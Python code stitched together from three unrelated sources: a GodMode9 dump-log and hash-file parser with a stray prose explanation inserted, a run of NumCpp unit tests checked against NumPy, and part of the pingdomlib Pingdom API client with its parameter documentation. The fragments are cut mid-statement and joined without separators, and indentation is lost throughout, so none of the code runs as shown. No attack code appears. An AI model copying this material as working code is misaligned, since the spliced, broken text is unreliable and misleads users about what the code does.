# Look for relevant data.
product_code = utilsGetRegexResult(product_code, GM9_PRODUCT_CODE_REGEX, cur_line)
cart_id = utilsGetRegexResult(cart_id, GM9_CART_ID_REGEX, cur_line)
platform = utilsGetRegexResult(platform, GM9_PLATFORM_REGEX, cur_line)
save_chip_id = utilsGetRegexResult(save_chip_id, GM9_SAVE_CHIP_ID_REGEX, cur_line)
timestamp = utilsGetRegexResult(timestamp, GM9_TIMESTAMP_REGEX, cur_line)
gm9_version = utilsGetRegexResult(gm9_version, GM9_VERSION_REGEX, cur_line)
# Skip this entry if we're missing critical data.
if (not product_code) or (not cart_id) or (not platform) or (not timestamp) or (not gm9_version): continue
# Sanitize data.
platform = platform.lower()
timestamp = WHITESPACE_REGEX.sub(' ', timestamp).strip().split(' ')[0]
# Get ROM properties. Skip entry if we're dealing with an invalid platform.
properties = ROM_PROPERTIES.get(platform, [])
if not properties: continue
(extension, crypto) = properties
# Get the last modified date from this file.
file_mtime = datetime.utcfromtimestamp(os.path.getmtime(entry.path)).replace(hour=0, minute=0, second=0)
gm9_mtime = datetime.strptime(timestamp, '%Y-%m-%d')
# Compare dates. Emit a warning if there's a mismatch.
if file_mtime != gm9_mtime:
eprint('WARNING: last modification date from \'%s\' doesn\'t match GodMode9\'s timestamp! (%s != %s).\n' % (entry.name, file_mtime.strftime('%Y-%m-%d'), gm9_mtime.strftime('%Y-%m-%d')))
elif file_mtime < DEFAULT_EARLIEST_DATE:
eprint('WARNING: dump date from \'%s\' is too old! (%s < %s).\n' % (entry.name, file_mtime.strftime('%Y-%m-%d'), DEFAULT_EARLIEST_DATE.strftime('%Y-%m-%d')))
elif file_mtime > now:
eprint('WARNING: dump date from \'%s\' exceeds current UTC timestamp! (%s > %s).\n' % (entry.name, file_mtime.strftime('%Y-%m-%d'), now.strftime('%Y-%m-%d')))
# Check if there's any media pictures available.
media_pictures = utilsGetBase64EncodedMediaPictures(indir, filename)
# Update GodMode9 dictionary.
platform_dict = gm9_cache.get(extension, {})
file_dict = platform_dict.get(filename, {})
file_dict.update({
'product_code': product_code,
'cart_id': cart_id,
'timestamp': timestamp,
'gm9_version': gm9_version,
'crypto': crypto
})
# Only store the Save Chip ID if we actually got it.
if save_chip_id: file_dict.update({ 'save_chip_id': save_chip_id })
# Merge file and media pictures dictionaries if we have picture data.
if media_pictures: file_dict = file_dict | media_pictures
platform_dict.update({ filename: file_dict })
gm9_cache.update({ extension: platform_dict })
return gm9_cache
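The timestamp handling in `utilsBuildGM9Cache` boils down to collapsing whitespace, keeping only the date portion, and parsing it into a `datetime` for comparison against the file's modification date. A standalone sketch of that normalization (the sample timestamp string is invented):

```python
import re
from datetime import datetime

WHITESPACE_REGEX = re.compile(r"\s+")

# A GodMode9-style timestamp with irregular spacing between date and time.
timestamp = "2022-01-05   13:37:00"

# Collapse runs of whitespace, then keep only the date part, as the script does.
date_part = WHITESPACE_REGEX.sub(' ', timestamp).strip().split(' ')[0]
gm9_mtime = datetime.strptime(date_part, '%Y-%m-%d')

print(date_part, gm9_mtime.year)  # -> 2022-01-05 2022
```

Dropping the time component is what makes the comparison with the `replace(hour=0, minute=0, second=0)`-truncated file mtime meaningful.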
def utilsGetChecksumData(indir: str, gm9_cache: Dict) -> Dict:
hash_entries: List = []
cur_hash_entry: str = ''
save_flag: bool = False
# Generate hash file path.
hash_file_path = os.path.join(indir, HASH_FILE_NAME)
if (not os.path.exists(hash_file_path)) or os.path.isdir(hash_file_path) or (not os.path.getsize(hash_file_path)): raise Exception('File \'%s\' unavailable or empty!' % (hash_file_path))
# Get hash entries from the hash file.
with open(hash_file_path, mode='r', encoding='utf-16') as hash_file:
for idx, line in enumerate(hash_file):
cur_line = line.strip()
if (not save_flag) and (cur_line == '----| File Data |--------------------------------------------------'):
save_flag = True
elif save_flag and ((cur_line == '-------------------------------------------------------------------') or (cur_line[0:5] == '----|')):
hash_entries.append(cur_hash_entry)
cur_hash_entry = ''
save_flag = False
elif save_flag:
cur_hash_entry += line
if not hash_entries: raise Exception('No valid File Data entries found in \'%s\'!' % (hash_file_path))
# Process hash entries.
for cur_hash_entry in hash_entries:
# Initialize variables.
filename: str = ''
size: str = ''
crc32: str = ''
md5: str = ''
sha1: str = ''
sha256: str = ''
# Look for relevant data.
filename = utilsGetRegexResult(filename, HASH_ENTRY_FILE_NAME_REGEX, cur_hash_entry)
size = utilsGetRegexResult(size, HASH_ENTRY_FILE_SIZE_REGEX, cur_hash_entry)
crc32 = utilsGetRegexResult(crc32, HASH_ENTRY_CRC32_REGEX, cur_hash_entry)
md5 = utilsGetRegexResult(md5, HASH_ENTRY_MD5_REGEX, cur_hash_entry)
sha1 = utilsGetRegexResult(sha1, HASH_ENTRY_SHA1_REGEX, cur_hash_entry)
sha256 = utilsGetRegexResult(sha256, HASH_ENTRY_SHA256_REGEX, cur_hash_entry)
# Skip entry if we couldn't find any relevant data.
if (not filename) or (not size) or ((not crc32) and (not md5) and (not sha1) and (not sha256)): continue
# Get basename and extension.
(basename, extension) = os.path.splitext(filename)
extension = extension[1:].lower()
# Get dictionary for this file.
platform_dict = gm9_cache.get(extension, {})
if not platform_dict:
eprint('WARNING: unrecognized file extension for \'%s\'! Skipping...\n' % (filename))
continue
file_dict = platform_dict.get(basename, {})
if not file_dict:
eprint('WARNING: GodMode9 data | |
100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(NumCpp.amin(cArray, NumCpp.Axis.COL).flatten(), np.min(data, axis=1))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert np.array_equal(NumCpp.amin(cArray, NumCpp.Axis.COL).flatten(), np.min(data, axis=1))
####################################################################################
def test_angle():
components = np.random.randint(-100, -1, [2, ]).astype(np.double)
value = complex(components[0], components[1])
assert np.round(NumCpp.angleScaler(value), 9) == np.round(np.angle(value), 9) # noqa
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
data = np.random.randint(-100, 100, [shape.rows, shape.cols]) + \
1j * np.random.randint(-100, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.angleArray(cArray), 9), np.round(np.angle(data), 9))
####################################################################################
def test_any():
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert NumCpp.any(cArray, NumCpp.Axis.NONE).astype(bool).item() == np.any(data).item()
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert NumCpp.any(cArray, NumCpp.Axis.NONE).astype(bool).item() == np.any(data).item()
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(NumCpp.any(cArray, NumCpp.Axis.ROW).flatten().astype(bool), np.any(data, axis=0))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert np.array_equal(NumCpp.any(cArray, NumCpp.Axis.ROW).flatten().astype(bool), np.any(data, axis=0))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(NumCpp.any(cArray, NumCpp.Axis.COL).flatten().astype(bool), np.any(data, axis=1))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert np.array_equal(NumCpp.any(cArray, NumCpp.Axis.COL).flatten().astype(bool), np.any(data, axis=1))
####################################################################################
def test_append():
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray1 = NumCpp.NdArray(shape)
cArray2 = NumCpp.NdArray(shape)
data1 = np.random.randint(0, 100, [shape.rows, shape.cols])
data2 = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray1.setArray(data1)
cArray2.setArray(data2)
assert np.array_equal(NumCpp.append(cArray1, cArray2, NumCpp.Axis.NONE).getNumpyArray().flatten(),
np.append(data1, data2))
shapeInput = np.random.randint(20, 100, [2, ])
numRows = np.random.randint(1, 100, [1, ]).item()
shape1 = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
shape2 = NumCpp.Shape(shapeInput[0].item() + numRows, shapeInput[1].item())
cArray1 = NumCpp.NdArray(shape1)
cArray2 = NumCpp.NdArray(shape2)
data1 = np.random.randint(0, 100, [shape1.rows, shape1.cols])
data2 = np.random.randint(0, 100, [shape2.rows, shape2.cols])
cArray1.setArray(data1)
cArray2.setArray(data2)
assert np.array_equal(NumCpp.append(cArray1, cArray2, NumCpp.Axis.ROW).getNumpyArray(),
np.append(data1, data2, axis=0))
shapeInput = np.random.randint(20, 100, [2, ])
numCols = np.random.randint(1, 100, [1, ]).item()
shape1 = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
shape2 = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item() + numCols)
cArray1 = NumCpp.NdArray(shape1)
cArray2 = NumCpp.NdArray(shape2)
data1 = np.random.randint(0, 100, [shape1.rows, shape1.cols])
data2 = np.random.randint(0, 100, [shape2.rows, shape2.cols])
cArray1.setArray(data1)
cArray2.setArray(data2)
assert np.array_equal(NumCpp.append(cArray1, cArray2, NumCpp.Axis.COL).getNumpyArray(),
np.append(data1, data2, axis=1))
####################################################################################
def test_arange():
start = np.random.randn(1).item()
stop = np.random.randn(1).item() * 100
step = np.abs(np.random.randn(1).item())
if stop < start:
step *= -1
data = np.arange(start, stop, step)
assert np.array_equal(np.round(NumCpp.arange(start, stop, step).flatten(), 9), np.round(data, 9))
####################################################################################
def test_arccos():
value = np.abs(np.random.rand(1).item())
assert np.round(NumCpp.arccosScaler(value), 9) == np.round(np.arccos(value), 9)
components = np.random.rand(2).astype(np.double)
value = complex(components[0], components[1])
assert np.round(NumCpp.arccosScaler(value), 9) == np.round(np.arccos(value), 9)
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arccosArray(cArray), 9), np.round(np.arccos(data), 9))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
data = np.random.rand(shape.rows, shape.cols) + 1j * np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arccosArray(cArray), 9), np.round(np.arccos(data), 9))
####################################################################################
def test_arccosh():
value = np.abs(np.random.rand(1).item()) + 1
assert np.round(NumCpp.arccoshScaler(value), 9) == np.round(np.arccosh(value), 9)
components = np.random.rand(2).astype(np.double)
value = complex(components[0], components[1])
assert np.round(NumCpp.arccoshScaler(value), 9) == np.round(np.arccosh(value), 9)
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.rand(shape.rows, shape.cols) + 1
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arccoshArray(cArray), 9), np.round(np.arccosh(data), 9))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
data = np.random.rand(shape.rows, shape.cols) + 1j * np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arccoshArray(cArray), 9), np.round(np.arccosh(data), 9))
####################################################################################
def test_arcsin():
value = np.abs(np.random.rand(1).item())
assert np.round(NumCpp.arcsinScaler(value), 9) == np.round(np.arcsin(value), 9)
components = np.random.rand(2).astype(np.double)
value = complex(components[0], components[1])
assert np.round(NumCpp.arcsinScaler(value), 9) == np.round(np.arcsin(value), 9)
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arcsinArray(cArray), 9), np.round(np.arcsin(data), 9))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
data = np.random.rand(shape.rows, shape.cols) + 1j * np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arcsinArray(cArray), 9), np.round(np.arcsin(data), 9))
####################################################################################
def test_arcsinh():
value = np.abs(np.random.rand(1).item())
assert np.round(NumCpp.arcsinhScaler(value), 9) == np.round(np.arcsinh(value), 9)
components = np.random.rand(2).astype(np.double)
value = complex(components[0], components[1])
assert np.round(NumCpp.arcsinhScaler(value), 9) == np.round(np.arcsinh(value), 9)
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arcsinhArray(cArray), 9), np.round(np.arcsinh(data), 9))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
data = np.random.rand(shape.rows, shape.cols) + 1j * np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arcsinhArray(cArray), 9), np.round(np.arcsinh(data), 9))
####################################################################################
def test_arctan():
value = np.abs(np.random.rand(1).item())
assert np.round(NumCpp.arctanScaler(value), 9) == np.round(np.arctan(value), 9)
components = np.random.rand(2).astype(np.double)
value = complex(components[0], components[1])
assert np.round(NumCpp.arctanScaler(value), 9) == np.round(np.arctan(value), 9)
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arctanArray(cArray), 9), np.round(np.arctan(data), 9))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
data = np.random.rand(shape.rows, shape.cols) + 1j * np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arctanArray(cArray), 9), np.round(np.arctan(data), 9))
####################################################################################
def test_arctan2():
xy = np.random.rand(2) * 2 - 1
assert np.round(NumCpp.arctan2Scaler(xy[1], xy[0]), 9) == np.round(np.arctan2(xy[1], xy[0]), 9)
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArrayX = NumCpp.NdArray(shape)
cArrayY = NumCpp.NdArray(shape)
xy = np.random.rand(*shapeInput, 2) * 2 - 1
xData = xy[:, :, 0].reshape(shapeInput)
yData = xy[:, :, 1].reshape(shapeInput)
cArrayX.setArray(xData)
cArrayY.setArray(yData)
assert np.array_equal(np.round(NumCpp.arctan2Array(cArrayY, cArrayX), 9), np.round(np.arctan2(yData, xData), 9))
####################################################################################
def test_arctanh():
value = np.abs(np.random.rand(1).item())
assert np.round(NumCpp.arctanhScaler(value), 9) == np.round(np.arctanh(value), 9)
components = np.random.rand(2).astype(np.double)
value = complex(components[0], components[1])
assert np.round(NumCpp.arctanhScaler(value), 9) == np.round(np.arctanh(value), 9)
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arctanhArray(cArray), 9), np.round(np.arctanh(data), 9))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
data = np.random.rand(shape.rows, shape.cols) + 1j * np.random.rand(shape.rows, shape.cols)
cArray.setArray(data)
assert np.array_equal(np.round(NumCpp.arctanhArray(cArray), 9), np.round(np.arctanh(data), 9))
####################################################################################
def test_argmax():
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(NumCpp.argmax(cArray, NumCpp.Axis.NONE).item(), np.argmax(data))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert np.array_equal(NumCpp.argmax(cArray, NumCpp.Axis.NONE).item(), np.argmax(data))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(NumCpp.argmax(cArray, NumCpp.Axis.ROW).flatten(), np.argmax(data, axis=0))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert np.array_equal(NumCpp.argmax(cArray, NumCpp.Axis.ROW).flatten(), np.argmax(data, axis=0))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(NumCpp.argmax(cArray, NumCpp.Axis.COL).flatten(), np.argmax(data, axis=1))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert np.array_equal(NumCpp.argmax(cArray, NumCpp.Axis.COL).flatten(), np.argmax(data, axis=1))
####################################################################################
def test_argmin():
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(NumCpp.argmin(cArray, NumCpp.Axis.NONE).item(), np.argmin(data))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert np.array_equal(NumCpp.argmin(cArray, NumCpp.Axis.NONE).item(), np.argmin(data))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArray(shape)
data = np.random.randint(0, 100, [shape.rows, shape.cols])
cArray.setArray(data)
assert np.array_equal(NumCpp.argmin(cArray, NumCpp.Axis.ROW).flatten(), np.argmin(data, axis=0))
shapeInput = np.random.randint(20, 100, [2, ])
shape = NumCpp.Shape(shapeInput[0].item(), shapeInput[1].item())
cArray = NumCpp.NdArrayComplexDouble(shape)
real = np.random.randint(1, 100, [shape.rows, shape.cols])
imag = np.random.randint(1, 100, [shape.rows, shape.cols])
data = real + 1j * imag
cArray.setArray(data)
assert np.array_equal(NumCpp.argmin(cArray, NumCpp.Axis.ROW).flatten(), np.argmin(data, axis=0))
import requests
import sys
from pingdomlib.check import PingdomCheck
from pingdomlib.contact import PingdomContact
from pingdomlib.reports import PingdomEmailReport, PingdomSharedReport
server_address = 'https://api.pingdom.com'
api_version = '2.0'
class Pingdom(object):
"""Main connection object to interact with pingdom
Attributes:
* pushChanges -- This boolean controls if changes are automatically
pushed to pingdom
* shortlimit -- String containing short api rate limit details
* longlimit -- String containing long api rate limit details
"""
def __init__(self, username, password, apikey, accountemail=None,
pushchanges=True, server=server_address):
self.pushChanges = pushchanges
self.username = username
self.password = password
self.apikey = apikey
self.accountemail = accountemail
self.url = '%s/api/%s/' % (server, api_version)
self.shortlimit = ''
self.longlimit = ''
@staticmethod
def _serializeBooleans(params):
""""Convert all booleans to lowercase strings"""
serialized = {}
for name, value in params.items():
if value is True:
value = 'true'
elif value is False:
value = 'false'
serialized[name] = value
return serialized
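A standalone sketch of the boolean serialization performed above, so its effect can be seen without a live Pingdom connection (the function name `serialize_booleans` is ours):

```python
def serialize_booleans(params):
    # Mirrors Pingdom._serializeBooleans: Python's True/False would be
    # sent on the wire as "True"/"False", but the Pingdom API expects
    # lowercase "true"/"false"; all other values pass through unchanged.
    serialized = {}
    for name, value in params.items():
        if value is True:
            value = 'true'
        elif value is False:
            value = 'false'
        serialized[name] = value
    return serialized

params = serialize_booleans({'paused': True, 'resolution': 5, 'notifywhenbackup': False})
```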
def request(self, method, url, parameters=dict()):
"""Requests wrapper function"""
# The requests library uses urllib, which serializes to "True"/"False" while Pingdom requires lowercase
parameters = self._serializeBooleans(parameters)
headers = {'App-Key': self.apikey}
if self.accountemail:
headers.update({'Account-Email': self.accountemail})
# Method selection handling
if method.upper() == 'GET':
response = requests.get(self.url + url, params=parameters,
auth=(self.username, self.password),
headers=headers)
elif method.upper() == 'POST':
response = requests.post(self.url + url, data=parameters,
auth=(self.username, self.password),
headers=headers)
elif method.upper() == 'PUT':
response = requests.put(self.url + url, data=parameters,
auth=(self.username, self.password),
headers=headers)
elif method.upper() == 'DELETE':
response = requests.delete(self.url + url, params=parameters,
auth=(self.username, self.password),
headers=headers)
else:
raise Exception("Invalid method in pingdom request")
# Store pingdom api limits
self.shortlimit = response.headers.get(
'Req-Limit-Short',
self.shortlimit)
self.longlimit = response.headers.get(
'Req-Limit-Long',
self.longlimit)
# Verify OK response
if response.status_code != 200:
sys.stderr.write('ERROR from %s: %d\n' % (response.url,
response.status_code))
sys.stderr.write('Returned data: %s\n' % response.json())
response.raise_for_status()
return response
def actions(self, **parameters):
"""Returns a list of actions (alerts) that have been generated for
your account.
Optional Parameters:
* from -- Only include actions generated later than this timestamp.
Format is UNIX time.
Type: Integer
Default: None
* to -- Only include actions generated prior to this timestamp.
Format is UNIX time.
Type: Integer
Default: None
* limit -- Limits the number of returned results to the specified
quantity.
Type: Integer (max 300)
Default: 100
* offset -- Offset for listing.
Type: Integer
Default: 0
* checkids -- Comma-separated list of check identifiers. Limit
results to actions generated from these checks.
Type: String
Default: All
* contactids -- Comma-separated list of contact identifiers.
Limit results to actions sent to these contacts.
Type: String
Default: All
* status -- Comma-separated list of statuses. Limit results to
actions with these statuses.
Type: String ['sent', 'delivered', 'error',
'not_delivered', 'no_credits']
Default: All
* via -- Comma-separated list of via mediums. Limit results to
actions with these mediums.
Type: String ['email', 'sms', 'twitter', 'iphone',
'android']
Default: All
Returned structure:
{
'alerts' : [
{
'contactname' : <String> Name of alerted contact
'contactid' : <String> Identifier of alerted contact
'checkid' : <String> Identifier of check
'time' : <Integer> Time of alert generation. Format
UNIX time
'via' : <String> Alert medium ['email', 'sms',
'twitter', 'iphone',
'android']
'status' : <String> Alert status ['sent', 'delivered',
'error',
'notdelivered',
'nocredits']
'messageshort': <String> Short description of message
'messagefull' : <String> Full message body
'sentto' : <String> Target address, phone number, etc
'charged' : <Boolean> True if your account was charged
for this message
},
...
]
}
"""
# Warn user about unhandled parameters
for key in parameters:
if key not in ['from', 'to', 'limit', 'offset', 'checkids',
'contactids', 'status', 'via']:
sys.stderr.write('%s not a valid argument for actions()\n'
% key)
response = self.request('GET', 'actions', parameters)
return response.json()['actions']
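The comma-separated filter parameters documented above (checkids, contactids, status, via) can be assembled from Python lists before the call; a hedged sketch (the helper name `build_action_filters` is ours, not part of pingdomlib):

```python
def build_action_filters(checkids=None, contactids=None, status=None, via=None):
    # Each filter accepted by actions() is a comma-separated string;
    # join Python lists into that form and drop empty filters.
    filters = {
        'checkids': checkids,
        'contactids': contactids,
        'status': status,
        'via': via,
    }
    return {
        name: ','.join(str(v) for v in values)
        for name, values in filters.items()
        if values
    }

params = build_action_filters(checkids=[85975, 85976], via=['email', 'sms'])
```

The resulting dict would then be passed as keyword arguments, e.g. `pingdom.actions(**params)`.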
def alerts(self, **parameters):
"""A short-hand version of 'actions', returns list of alerts.
See parameters for actions()"""
return self.actions(**parameters)['alerts']
def getChecks(self, **parameters):
"""Pulls all checks from pingdom
Optional Parameters:
* limit -- Limits the number of returned probes to the
specified quantity.
Type: Integer (max 25000)
Default: 25000
* offset -- Offset for listing (requires limit.)
Type: Integer
Default: 0
* tags -- Filter listing by tag/s
Type: String
Default: None
"""
# Warn user about unhandled parameters
for key in parameters:
if key not in ['limit', 'offset', 'tags']:
sys.stderr.write('%s not a valid argument for getChecks()\n'
% key)
response = self.request('GET', 'checks', parameters)
return [PingdomCheck(self, x) for x in response.json()['checks']]
def getCheck(self, checkid):
"""Returns a detailed description of a specified check."""
check = PingdomCheck(self, {'id': checkid})
check.getDetails()
return check
def getResults(self, checkid):
""" Returns detailed results for a specified check id."""
response = self.request('GET','results/%s' % checkid)
return response.json()
def newCheck(self, name, host, checktype='http', **kwargs):
"""Creates a new check with settings specified by provided parameters.
Provide new check name, hostname and type along with any additional
optional parameters passed as keywords. Returns new PingdomCheck
instance
Types available:
* http
* httpcustom
* tcp
* ping
* dns
* udp
* smtp
* pop3
Optional parameters:
* paused -- Check should be paused
Type: Boolean
Default: False
* resolution -- Check resolution time (in minutes)
Type: Integer [1, 5, 15, 30, 60]
Default: 5
* contactids -- Comma separated list of contact IDs
Type: String
Default: None
* sendtoemail -- Send alerts as email
Type: Boolean
Default: False
* sendtosms -- Send alerts as SMS
Type: Boolean
Default: False
* sendtotwitter -- Send alerts through Twitter
Type: Boolean
Default: False
* sendtoiphone -- Send alerts to iPhone
Type: Boolean
Default: False
* sendtoandroid -- Send alerts to Android
Type: Boolean
Default: False
* sendnotificationwhendown -- Send notification when check is down
the given number of times
Type: Integer
Default: 2
* notifyagainevery -- Set how many results to wait for in between
notices
Type: Integer
Default: 0
* notifywhenbackup -- Notify when back up again
Type: Boolean
Default: True
* use_legacy_notifications -- Use the old notifications instead of
BeepManager
Type: Boolean
Default: False
HTTP check options:
* url -- Target path on server
Type: String
Default: /
* encryption -- Use SSL/TLS
Type: Boolean
Default: False
* port -- Target server port
Type: Integer
Default: 80
* auth -- Username and password for HTTP authentication
Example: user:password
Type: String
Default: None
* shouldcontain -- Target site should contain this string.
Cannot be combined with 'shouldnotcontain'
Type: String
Default: None
* shouldnotcontain -- Target site should not contain this string.
Cannot be combined with 'shouldcontain'
Type: String
Default: None
* postdata -- Data that should be posted to the web page,
for example submission data for a sign-up or login form.
The data needs to be formatted in the same way as a web browser
would send it to the web server
Type: String
Default: None
* requestheader<NAME> -- Custom HTTP header, replace <NAME> with
desired header name. Header in form: Header:Value
Type: String
Default: None
HTTPCustom check options:
* url -- Target path on server
Type: String
Mandatory
* encryption -- Use SSL/TLS
Type: Boolean
Default: False
* port -- Target server port
Type: Integer
Default: 80
* auth -- Username and password for HTTP authentication
Example: user:password
Type: String
Default: None
* additionalurls -- Colon-separated list of additional URLs with
hostname included
Type: String
Default: None
TCP check options:
* port -- Target server port
Type: Integer
Mandatory
* stringtosend -- String to send
Type: String
Default: None
* stringtoexpect -- String to expect in response
Type: String
Default: None
DNS check options:
* expectedip -- Expected IP
Type: String
Mandatory
* nameserver -- Nameserver to check
Type: String
Mandatory
UDP check options:
* port -- Target server port
Type: Integer
